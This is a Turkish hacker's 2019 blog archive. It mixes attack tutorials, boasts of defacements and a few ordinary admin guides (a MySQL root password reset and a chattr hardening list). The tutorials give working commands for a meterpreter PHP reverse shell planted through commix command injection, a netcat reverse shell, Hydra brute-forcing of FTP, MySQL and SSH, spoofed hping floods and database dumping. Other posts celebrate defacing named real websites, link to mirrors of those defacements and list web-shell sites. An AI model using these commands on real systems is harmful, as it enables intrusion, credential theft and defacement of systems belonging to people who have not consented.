Archive for 2019

Adım 1: Meterpreter ile PHP shell oluşturmak ;


Kod:
msfvenom -p php/meterpreter/reverse_tcp LHOST=İP_ADRESİNİZ  LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php

Adım 2: msfconsole ile Multi Handleri Başlatıyoruz ;

Kod:
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...

3. Adım: Hedefin "/ var / www /" dizinindeki "msfvenom.php" dosyasını oluşturmak ve uygulamak için commix-i kullanın.
Kod:
https://github.com/commixproject/commix

Kod:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"

SHELL ATILMIŞTIR !

Kod:
[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400

meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >
Temel Olarak Hping ile Raw ip, ICMP , TCP ve UDP paketleri üretilebilir. Üretilecek paketlere ait tüm özellikler komut satırından belirlenebilir.
SYN —> ( hping -S )
FIN —-> ( hping -F )
RST —-> ( hping -R)
ACK —-> ( hping -A)
PUSH —> ( hping -P)
URG —-> ( hping -U)
Kullanımı : hping -S -c 100 -p 80 hedefsite.com
-c : Bu parametre ile kaç adet bayrak gönderileceğini belirleyebiliriz.
-p : Bu parameter ile hangi porta gönderileceğini belirleyebiliriz.
-a : Sahte IP adresi vererek IP adresinizi gizlememizi sağlayan parametredir.

– Hping3 –

Posted by ROOTAYYILDIZ
ARP ( Address Resolution Protocol ) zehirlenmesi OSI katman modelinde network katmanında yer alır. Bu katmanda yer alan ARP, IP adreslerini MAC adreslerine çevirir. Bu IP adreslerine Karşılık Gelen MAC adreslerini ARP tablolarında tutar ve ARP tabloları da belirli aralıklarla güncellenir. Bir ip adresine karşılık , sahte bir MAC oluşturmasını ARP zehirlenmesi denir.
ARP Poisoning Saldırısı İçin Kullanılabilecek Araçlar:
– Arp Tool 1.0.2
– Etherial ya da Wireshark
– Arpison
– Ettercap
– Cain & Abel
Metasploit,hemen hemen her Pentest’de (Penetration Testniing) kullanılan Pentesterlerin vazgeçilmez aracıdır.İçerisinde birçok exploit,auxilary ve payload modulleri bulunur.
Metasploit aracımızı daha hızlı kullanmamız için bazı konfigürasyon ayarlarını yapmamız lazım.Metasploitimizin daha hızlı çalışabilmesi için onu bir veritabanına bağlamamız gerekir.Terminali açarak şu komutları yazıyoruz:
service postgresql start => postgresql servisini çalıştırdık.
msfdb imit => Msfconsole’yi veritabanına bağladık.
Bu şekilde daha hızlı arama yapabilmesini sağlamış olduk.
-h komutu ile komutlar hakkında bilgi sahibi olabiliriz.
Şimdi Metasploit İle Bir Exploitleme İşlemi Nasıl Yapılır Onu Öğreneceğiz:
İlgili servisin versiyon bilgisini bulduktan sonra uygun bir exploit aramak için şu komutu giriyoruz:
search “Versiyon Bilgisi” type:exploit (Auxilary aramak istiyorsak Auxilary gibi)
Tabiiki bu versiyona uygun exploiti aramak için sadece msfconsole’yi kullanmayız.Google üzerinden (exploit-db,rapid7,cxsecurity,0daytoday.com,Vb..) veyahut terminal üzerinden de exploit aramamızı gerçekleştirebiliriz.Terminal üzerinden bu aramayı gerçekleştirmek için “Searchsploit” i kullanabiliriz.
searchsploit “Versiyon Bilgisi” => Bu şekilde arama yapabiliriz.
Eğer bu exploiti Bilgisayarımıza indirmek istiyorsak şu komutu kullanırız:
searchsploit -m exploit numarası => Bu şekilde Exploiti bilgisayarımıza indirebiliriz.
Şimdi uygun exploiti bulduğumuzu varsayarak devam edelim.
use exploit => bu komut ile exploitimize geçmiş oluyoruz.
show options => Exploitin bizden hangi bilgileri istediğine bakarız.YES yazan yerleri girmek zorundayız.(rhost Vb. gibi)Bunu Set komutu ile gireriz.Yani Şöyle:
set ‘hedef ip’ => rhost u gireriz.
Exploitin bizden istediklerinide gerçekleştirdikten sonra exploit/run komutu ile exploiti çalıştırabiliriz.Eğer exploit başarılı ise msfconsolede açılacaktır.

EXPLOİTATİON(METASPLOİT)

Posted by ROOTAYYILDIZ



Netcat , TCP/IP üzerinden veri gönderme veya almaya yarayan bir araçtır. Netcat aracı ile herhangi bir portu dinleyebilir, port tarama, bağlantı oluşturma, shell oturumu, dosya transferi gibi pek çok şey yapılabilir.
Örnek Komutlar:
nc -v hedefsite.com 80
nc -vz hedefsite.com 80
nc -v -n IP_ADRESI -z 1-1024
nc -lvp PORT

– NETCAT (NC) –

Posted by ROOTAYYILDIZ

Trazer Hacked

Posted by ROOTAYYILDIZ



MySQL / MariaDB root şifrenizi unuttuysanız bu doküman size şifrenizi kurtarmanıza yardımcı olacaktır. Birçok kullanıcının başına gelebilecek olan bu durum basitçe anlatılmıştır.

Gereksinimler

MySQL veya MariaDB’ nin üzerinde çalıştığı Linux sunucunuza sudo yetkili hesabınızla giriş yapmalısınız.

Veritabanı Sürümü Kontrolü

Aşağıdaki komut bize veritabanımızın sürümü hakkında bilgi verecektir.
$ mysql --version
MySQL veritabanı çalışıyorsa sunucunuzda aşağıdakine benzer bir çıktı ile karşılaşacaksınız.
mysql Ver 14.14 Distrib 5.5.53, for debian-linux-gnu (x86_64) using readline 6.3
MariaDB veritabanı çalışıyorsa sunucunuzda aşağıdakine benzer bir çıktı ile karşılaşacaksınız.
mysql Ver 15.1 Distrib 5.5.52-MariaDB, for Linux (x86_64) using readline 5.1
Şimdi burada hangi veritabanı türü ve sürümünü kullandığımızı not etmemiz gerek. Dokümanın ilerleyen kısımlarında bu bilgiler işimize yarayacak.

Veritabanının Durdurulması

Root şifresini değiştirmeden ömce çalışan veritabanını durdurmamız gerekmketedir.
Aşağıdaki komut ile MySQL veritabanınızı durdurabilirsiniz.
$ sudo systemctl stop mysql
Aşağıdaki komut ile MariaDB veritabanınızı durdurabilirsiniz.
$ sudo systemctl stop mariadb

İzin Kontrolü Olmadan Veritabanının Başlatılması

Eğer MySQL veya MariaDB veritabanlarınızı kullanıcı ayrıcalıkları olmadan çalıştırırsanız şifresiz olarak veritabanı komut satırına erişim sağlayabilirsiniz.
Bunu yapabilmek için kullanıcı ayrıcalıkları bilgilerini tutan grant tables’ ı ve başka kullanıcıların erişimini önleyen networking’ i durdumanız gerekmektedir.
Veritabanını hem grant tables’ ı yüklemeden hem de networking’ i başlatmadan aşağıdaki komut ile çalıştırmalıyız.
$ sudo mysqld_safe --skip-grant-tables --skip-networking &
Buradaki ampersand(&) karakterini kullanmamızın sebebi ilgili işlemi arka plana göndermek içindir, bu şekilde ilgili işlem arka plan da çalışmaya devam ederken biz de sunucu üzerinde işlemlerimize devam edebiliriz.
Şimdi veritabanımızı root kullanıcısı ile açıyoruz. Şu anda bizden şifre istememesi gerekmektedir.
$ mysql -u root
MySQL çalışan sunucumuzda aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
MariaDB çalışan sunucumuzda aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

Root Şifresinin Değiştirilmesi

ALTER USER komutu ile MySQL veritabanı root şifresini değiştirebiliriz. Ancak öncesinde çalışmasını engellediğimiz grant tables’ ın tekrardan yüklenmesini sağlamamız gerekmektedir.
Aşağıdaki komut ile veritabanı yetkilendirmelerinin tekrardan okunarak, güncel olmasını sağlamalısınız.
mysql> FLUSH PRIVILEGES;
MySQL 5.7.6 / MariaDB 10.1.20 ve daha yeni sürümler için aşağıdaki şekilde root şifresini değiştirebiliriz.
 mysql> ALTER USER 'root'@'localhost' IDENTIFIED BY 'Yeni_rootSifreniz';
MySQL 5.7.5 / MariaDB 10.1.20 ve daha eski sürümleri için aşağıdaki şekilde root şifresini değiştirebiliriz.
 mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Yeni_rootSifreniz');
Aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Query OK, 0 rows affected (0.00 sec)
Eğer ALTER USER komutu işe yaramadıysa aşağıdaki UPDATE … SET komutları ile root şifrenizi sıfırlamayı deneyebilirsiniz.
mysql> UPDATE mysql.user SET authentication_string = PASSWORD('Yeni_rootSifreniz') WHERE User = 'root' AND Host = 'localhost';
Bu işlem sonrasında grant tables’ ı tekrar aktif etmeyi unutmayınız. Bu işlem için aşağıdaki komut ile veritabanı yetkilendirmelerinin tekrardan okunarak, güncel olmasını sağlamalısınız.
mysql> FLUSH PRIVILEGES;

Veritabanının Tekrardan Normal Şekilde Başlatılması

Tüm aşamaları başarılı şekilde yapıp root şifresini sıfırladıktan sonra artık veritabanımızı normal şekilde çalıştırıp, root kullanıcısı ile erişim sağlayabilirsiniz.
MySQL işleminin sonlanması için aşağıdaki komut yardımcı olacaktır.
$ sudo kill `cat /var/run/mysqld/mysqld.pid`
MariaDB işleminin sonlanması için aşağıdaki komut yardımcı olacaktır.
$ sudo kill `/var/run/mariadb/mariadb.pid`
Şimdi MySQL veya MariaDB veritabanı çalışan sunucumuzda ilgili servisleri tekrar çalıştıralım.
MySQL veritabanı için aşağıdaki komut yardımcı olacaktr.
$ sudo systemctl start mysql
MariaDB veritabanı için aşağıdaki komut yardımcı olacaktr.
$ sudo systemctl start mariadb
Şimdi yeni verdiğimiz root şifresi ile giriş yapabiliriz.
$ mysql -u root -p
Bu komut sonrası yeni atadığınız şifre ile başarılı şekilde veritabanınıza giriş yapabilirsiniz.


FTP(File Transfer Protocol) 21.port üzerinde çalışan TCP bazlı bir servistir. Website dosyalarını sunucuya atmak için kullanılır.Saldırgan bu protokole erişim sağladıktan sonra Önemli Dosyaları Çalabilir veya Uzaktan Kod Yürütebilir.
Çoklu proje geliştiren firmalarda ftp girişi genelde “anonymous”dur.Yani user=anonymous , password=xxx@hotmail.com(random bir e-postadır) olarak girilebilir.Servise bağlandıktan sonra temel linux komutları geçerlidir.Örneğin sistemde gerekli yetki mevcut ise “get x” komutu ile sistemdeki x dosyasını çekebiliriz.
Eğer FTP girişi anonymous değilse Kali Linux’da yüklü olarak gelen “Hydra” adlı tool ile Brute Force Yapabiliriz.Bunu terminali açarak şu şekilde yapıyoruz:
hydra -l ‘kullanıcı adı’ -P ‘Kullanılacak Şifre Wordlistinin Yolu’ ‘hedef ip adresi’ ftp -vV
Komutu ile Brute Force yapabiliriz.Brute Force doğru giriş bilgilerini bulduğu zaman yeşil bir şekilde ekrana yansıtacaktır.
Bu servise pentest yapmanın bir başka yolu ise Servisin versiyonuna uygun public edilmiş bir exploiti kullanarak sızmaktır.Bu işlemi bir sonraki yazımızda detaylı bir biçimde ele alacağız.

21.PORT(FTP) SALDIRILARI

Posted by ROOTAYYILDIZ


MySQL 3306 numaralı port üzerinde çalışan TCP bazlı bir servistir.Diğer servislerin aksine MySQL’de mutlaka root adında bir kullanıcı vardır.Bu servis üzerine kaba kuvvet saldırıları(Brute Force) yapılırken user olarak root kullanılır.
MySQL üzerine Kali Linux’da yüklü olarak gelen “Hydra” adlı tool ile kaba kuvvet saldırıları gerçekleştirilir.Bunun için terminali açarak şu komutu gireriz:
hydra -l root(kullanıcı adı) -P ”şifre için kullanılacak wordlist’in yolu” mysql://ip adresi
komutu ile MySQL servisi üzerine kaba kuvvet saldırıları yapılabilir.Hydra doğru giriş bilgilerini bulduktan sonra ekranda yeşil bir yazıyla gösterecektir.
Bu servis üzerine girişler bazen parolasız olabilir.Bu girişler sadece kullanıcı adıyla yapılır yani root ile giriş yapılır.Bunun sebebi firmanın parolasız girişi EVET olarak bırakmasıdır.Ve servise şöyle bağlanılır:
mysql -u root -p -h “hedef ip adresi”
Bu servise bağlandıktan sonra kullanılacak bazı komutlar aşağıdaki gibidir:
Örnek bir MySQL üzerinden gidelim.Veri tabanımızın adı x olsun.Tablomuzun adı y olsun ve tablomuzun içinde users_users adında bir dosya olsun.Bu dosyanın içerisinde de e-mail,login,password adında veriler olsun.
show databases => Veri Tabanlarını Görüntüleriz
use x => x Veri Tabanının İçindeki Tabloları Gösterir.
describes y => y Tablosunun İçindekileri Gösterir.
select e-mail,login,password from users_users; =>e-mail,login ve password Bilgilerini Seçeriz.
MySQL’de yeterli yetkimiz var ise sistemin Geri Yükleme(Backup) dosyalarını alabiliriz.Bunun İçin “mysqldump” aracını kullanırız.
Bunun için örnek bir sistem oluşturalım.Sistemimizin adı “BUG” olsun.Bu sistemin Backup dosyasını almak için aşağıdaki komutu kullanıyoruz:
mysqldump -h “hedef ip adresi” -u root -p “Parola” bug > bug_backup.txt
Böylece bug adındaki sistemin backup dosyalarını bilgisayarımıza alıyoruz.
MySQL servisi üzerine yapılabilecek saldırılar bunlard

MySQL SALDIRILARI

Posted by ROOTAYYILDIZ


Tomcat 8080/8180 portunda çalışan TCP bazlı bir servisdir.Tomcat saldırıları genelde küçük wordlistlerle gerçekleştirilir.Çünkü Tomcat servisi 15-20 giriş denemesinden sonra kendini 3-5 dakika arası kitler.Bu yüzden Tomcat servisine manuel kaba kuvvet saldırısı yapmak en mantıklısıdır.
Tomcat servisine tarayıcı üzerinden erişilir.Herhangi bir yol ile Tomcat giriş bilgilerine eriştiğimiz bir sisteme .jsp uzantılı dosyalar yüklenebilir.Bu dosyalar ile uzaktan kod yürütme işlemi gerçekleştirilebilir.Bu dosyalara Github’dan rahatlıkla erişim sağlayabilirsiniz.
Bir örnek vermek gerekirse Uzaktan Kod Yürütme ile kendimize bir Netcat Shell bağlantısı alabiliriz.
Örnek Komutlar Aşağıdaki Gibidir:
Kali Linux’da terminali açıp şu komutu gireriz:
nc -l -v -p 4444
Uzaktaki komut satırımıza da şu komutu veriyoruz:
nc -e bin/bash “ip adresi” 4444
Ve böylelikle hedefin komut satırında istediğimiz komutları çalıştırabiliriz.

TOMCAT SALDIRILARI

Posted by ROOTAYYILDIZ

 

 

SAMBA SALDIRILARI:

Samba,445 numaralı portta çalışan TCP bazlı bir servistir.Kullanım amacı genelde domain kurmak,dosya paylaşımını yönetmek,sistem yönetmektir.
Microsoft sistemlerde kullanımı daha sık görülür.Linux sistemlerde genelde tercih edilmez.Nadir olarak kullanılırlar.
Bu sistemlerde “Anonymous Login” tarzı bir login mevcut olabilir.
Samba’ya şöyle giriş yapılır:
rpcclient -U** “ip adresi” ile giriş yapılır.
Samba’ya erişim sağlandıktan sonra “enum4linux” toolu kullanılarak erişilebilecek bütün bilgilere erişim sağlanır.
Örneğin bir dizine şöyle erişilir:
smbclient //ip adresi /tmp => dizine erişir.
Ayrıca exploit-db ve birçok exploit sitesinde samba üzerine yazılmış exploitler mevcuttur.

SSH SALDIRILARI:

SSH,22 numaralı port üzerinde çalışan TCP bazlı bir servistir.SSH servisinin amacı uzaktan yönetimdir.Bu porta Pentest işlemi sadece kaba kuvvet(Brute Force) saldırısı ile yapılabilir.
Kaba kuvvet saldırılarında “Hydra” adlı tool kullanılır.
Hydra’yı bu saldırıda şöyle kullanırız:
hydra -l “kullanıcı adı” -P “Password için kullanıcalak wordlistin yolu” ssh://”İp Adresi”
Hydra bu komutla birlikte Brute Force’yi başlatır.Doğru giriş bilgilerini bulduktan sonra ekranda yeşil bir yazı ile gösterecektir.Kullanıcı bilgilerini öğrendikten sonra şöyle bağlanıyoruz:
ssh “kullanıcı adı” “İp adresi”

TELNET SALDIRILARI:

Telnet,23. portta çalışan bir servisdir.Kullanım amacı SSH İle aynıdır.Yani uzaktan yönetimdir.Fakat SSH servisine göre daha güvensizdir.
Genel saldırı mantığı brute forceye dayanır.Çoğunlukla varsayılan parolalar kullanılır.

Serena Williams Hacked

Posted by ROOTAYYILDIZ


coderwall hacked

Posted by ROOTAYYILDIZ







 
http://boxset.beyonce.com/password
http://zone-h.org/mirror/id/32950902

https://boards.diddy.com/password
http://zone-h.org/mirror/id/32950725


 
https://hacknews.org/2019/10/30/rootayyildiz-calmadan-hackledim/

https://www.boyabatsesi.com/gundem/boyabatli-hacker-rootayyildiz-dunyaca-unlu-justin-timberlake-nin-h2773.html

https://hacknews.org/2019/10/30/rootayyildiz-hack-kulturunu-yasatmak-adina/
http://archive.is/cMaw8
https://mirror-h.org/zone/2411871/
 https://hacknews.org/2019/10/26/koswog-com-c-r-a-c-k-l-e-n-d-i/


Koswog Hacked 2 :)

Posted by ROOTAYYILDIZ

 Kendilerine Tanrı Diye Rank Vermişler İş Başa Düştü Sploit Kardeşim İle Baskınımızı Yaptık...

https://hacknews.org/2019/10/19/sahte-tanri-hacklendi/


siberhackers.org Hacked

Posted by ROOTAYYILDIZ

chattr -i /usr/bin/vdir
chmod 700 /usr/bin/vdir
chattr +i /usr/bin/vdir
 
chattr -i /usr/bin/perl
chmod 700 /usr/bin/perl
chattr +i /usr/bin/perl
 
chattr -i /bin/cat
chmod 700 /bin/cat
chattr +i /bin/cat
 
chattr -i /bin/ln
chmod 700 /bin/ln
chattr +i /bin/ln
 
chattr -i /usr/bin/dir
chmod 700 /usr/bin/dir
chattr +i /usr/bin/dir
 
chattr -i /usr/bin/find
chmod 700 /usr/bin/find
chattr +i /usr/bin/find
 
chattr -i /usr/bin/tac
chmod 700 /usr/bin/tac
chattr +i /usr/bin/tac
 
chattr -i /bin/ls
chmod 700 /bin/ls
chattr +i /bin/ls
 
Komutları toplu olarak kopyalayıp bir kerede ssh ekranına yapıştırıp enterleyebilirsiniz. Komutları girince sunucumuzda perl kapanır. Bu nedenle kontrol panel girişlerini alttaki şekilde yapmalısınız.
Whm: siteniz.com:2086
cPanel: siteniz.com:2082
Mail: siteniz.com:2095
Yani /whm veya /mail gibi komutlarla girmeye çalıştığınızda hata verecektir. Bu durum hosting firması sahibi iseniz ve sizi rahatsız edecekse, şu komutu girerekte üsttekine göre daha az güvenli bir komut kullanabilirsiniz.

chattr -i /usr/bin/vdir
chmod 700 /usr/bin/vdir
chattr +i /usr/bin/vdir
 
chattr -i /usr/bin/perl
chmod 711 /usr/bin/perl
chattr +i /usr/bin/perl
 
chattr -i /bin/cat
chmod 700 /bin/cat
chattr +i /bin/cat
 
chattr -i /bin/ln
chmod 700 /bin/ln
chattr +i /bin/ln
 
chattr -i /usr/bin/dir
chmod 700 /usr/bin/dir
chattr +i /usr/bin/dir
 
chattr -i /usr/bin/find
chmod 700 /usr/bin/find
chattr +i /usr/bin/find
 
chattr -i /usr/bin/tac
chmod 700 /usr/bin/tac
chattr +i /usr/bin/tac
 
chattr -i /bin/ls
chmod 700 /bin/ls
chattr +i /bin/ls
 
 
değişen tek şey: chmod 700 /usr/bin/perl  burası. 700 olan değer 711 olarak kullanıldı. Güncellemelerde de belirli hatalar alabilirsiniz. Bu nedenle apache update ya da sunucu güncellemelerinden önce üstteki kural serilerini geçici süre devre dışı bırakmalısınız.


biliyorsunuz ki l4unx nicki bana ait o zamanlar yine dostum asense ile koswog.com içinden geçmiştim 

https://mirror-h.org/zone/2017020/
https://archive.fo/EQIA1

Koswog Hacked

Posted by ROOTAYYILDIZ
http://zone-h.org/mirror/id/32918332
https://hacknews.org/2019/10/16/z3r0daya-indexli-cevap/


Global Rank

  163,542

Turkey Rank:

  1,703

 

 " Site Yetkilisi İle Konuşup Güvenlik Zafiyetlerini Kapatmalarında Yardımcı Oldum "

Webdiyo.com Hacked

Posted by ROOTAYYILDIZ

https://mirror-h.org/zone/2052366/

Ayyapim.com uyarıldı

Posted by ROOTAYYILDIZ

http://phpshell.xyz/
http://archive.is/QKywU

http://hacklink.info/index.html
http://archive.is/IQtjl

http://b374k.co/index.html
http://archive.is/U3Gnj

http://shell4.com/index.html
http://archive.is/maSFl

http://adwordsmarket.com/index.html
http://archive.is/kd2rA

http://www.filmiseyretizle.com/index.php
https://mirror-h.org/zone/2156317/

Belki Hacklendigini Kabul Etmez Diye Spydaki Profiline^de Msj Bıraktım
https://mirror-h.org/zone/2156365/
https://spyhackerz.org/forum/members/tolank1.64/​

https://lamerhaber.com/2019/05/21/tolank1-fenalasti-tum-siteleri-hacklendi/




Tolank1 & Hector Hacked

Posted by ROOTAYYILDIZ





TEK BİLDİĞİN EDİT BAŞKA HİÇ BİRŞEY YO

https://hacknews.org/2019/10/06/b0ru70-ifsa-oldu/

B0RU70 İFŞA

Posted by ROOTAYYILDIZ

[ root ⚔ αyyιldιz ]